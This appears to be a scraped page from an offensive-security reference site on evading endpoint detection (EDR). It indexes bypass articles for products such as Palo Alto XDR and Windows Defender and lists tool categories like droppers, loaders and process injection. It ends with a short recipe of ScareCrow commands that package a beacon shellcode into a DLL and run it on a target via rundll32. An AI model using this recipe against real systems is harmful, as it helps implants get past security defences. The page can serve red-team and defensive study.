Skip to main content Link Menu Expand (external link) Copy Copied

evasion / edr

MENU

MUST-WATCH

🔥 GEMINI YT Channel 🔥

🔥 CMEPW BypassAV mindmap 🔥

_repo_last_pushed_stars_watch_language

articles

Date EDR Version Bypass Author
2023-02 Palo Alto XDR - auditconf  
2022-09 Palo Alto XDR 7.8.0 regnreboot @bentamam
2022-03 ALL ALL reflectiveDump s3cur3th1ssh1t
2021-10 Windows Defender x viperone  
2021-07 Palo Alto XDR 7.4.0 privescndisable @mrdox
2021-02 ALL ALL scarecrow part 1 Optiv
2021-02 ALL ALL scarecrow part 2 Optiv
2020-11 Phantom - xxx  

eol

tools

all-in-one

_repo_last_pushed_stars_watch_language

dropper

_repo_last_pushed_stars_watch_language

manual-loader

_repo_last_pushed_stars_watch_language

automatic-loader

_repo_last_pushed_stars_watch_language

generate-shellcode

_repo_last_pushed_stars_watch_language

manual-obfuscation

_repo_last_pushed_stars_watch_language

automatic-obfuscation

_repo_last_pushed_stars_watch_language

process-injection

_repo_last_pushed_stars_watch_language

detect-vm

_repo_last_pushed_stars_watch_language

from-pe-to-shellcode

_repo_last_pushed_stars_watch_language

from-alive-beacon

_repo_last_pushed_stars_watch_language

recipes

# generate the shellcode
./ScareCrow -I beacon.bin -domain -Loader dll -Exec VirtualAlloc

# target machine: run the shellcode
rundll32.exe  helloworld.dll, DllRegisterServer